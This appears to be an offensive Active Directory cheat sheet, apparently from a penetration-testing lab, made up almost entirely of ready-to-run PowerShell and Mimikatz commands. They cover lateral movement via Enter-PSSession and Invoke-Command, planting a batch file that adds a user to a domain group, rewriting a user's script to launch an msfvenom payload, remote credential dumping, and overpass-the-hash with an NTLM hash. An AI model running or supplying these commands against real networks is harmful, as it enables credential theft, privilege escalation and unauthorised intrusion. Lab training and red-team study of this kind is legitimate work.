Remoting

Using Find-LocalAdminAccess we can find local admins on the machine and via Enter-PSSession we can laterally move within the network

Enter-PSSession -Computername <servername>

Stateful command via Enter-PSSession

$sess = New-PSSession -Computername <servername>
Enter-PSSession -Session $sess

Stateful command via Invoke-Command

$sess = New-PSSession -Computername <servername>
Invoke-Command -Session $sess -ScriptBlock {$proc = Get-Process}
Invoke-Command -Session $sess -ScriptBlock {$proc.Name}

Write file via script block

Invoke-Command -ComputerName <servername> -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

Read file via script block

Invoke-Command -computername <servername> -ConfigurationName dc_manage -ScriptBlock {((cat "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msfvenom.exe') | set-content -path c:\users\akash\Desktop\wm.ps1} -credential $cred

Command execution using command and ScriptBlock

Invoke-Command -computername computer-name -ConfigurationName dc_manage -credential $cred -command {whoami}
Invoke-Command -computername computer-name -ConfigurationName dc_manage -credential $cred -ScriptBlock {whoami}
Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -command {whoami}
Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami}

File execution using ScriptBlock

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock{"C:\temp\mimikatz.exe"}

File execution using FilePath

Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath "C:\temp\mimikatz.exe"

Mimikatz

Over Pass the hash is an attack that enables an adversary to pass a user account's NTLM hash into the Kerberos authentication provider

Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntImhash> /run:powershell.exe"'

Last updated